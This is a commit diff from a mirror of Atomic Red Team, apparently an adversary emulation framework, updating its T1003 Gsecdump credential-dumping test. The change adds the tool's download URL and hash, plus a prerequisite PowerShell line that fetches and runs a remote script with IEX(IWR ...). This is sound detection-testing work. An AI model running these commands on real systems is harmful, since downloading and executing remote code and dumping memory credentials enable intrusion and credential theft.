security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-03-07 22:20:30 +00:00
parent 291346e52b
commit 31f946622d
2 changed files with 23 additions and 5 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1003/T1003.md
+8 -2
View File
@@ -201,6 +201,8 @@ Dump credentials from memory using Gsecdump
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder\T1003\bin\gsecdump.exe|
| gsecdump_url | Path to download Gsecdump binary file | url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe|
| gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
@@ -211,14 +213,18 @@ Dump credentials from memory using Gsecdump
#### Dependencies: Run with `powershell`!
##### Description: Windows Credential Editor must exist on disk at specified location (#{gsecdump_exe})
##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
##### Check Prereq Commands:
```
if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
Write-Host Automated installer not implemented yet
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
```
atomics/index.yaml
+15 -3
View File
@@ -19486,12 +19486,24 @@ credential-access:
description: Path to the Gsecdump executable
type: Path
default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
gsecdump_url:
description: Path to download Gsecdump binary file
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: String
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
dependency_executor_name: powershell
dependencies:
- description: Windows Credential Editor must exist on disk at specified location
(#{gsecdump_exe})
- description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}'
get_prereq_command: Write-Host Automated installer not implemented yet
get_prereq_command: |-
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
executor:
name: command_prompt
elevation_required: true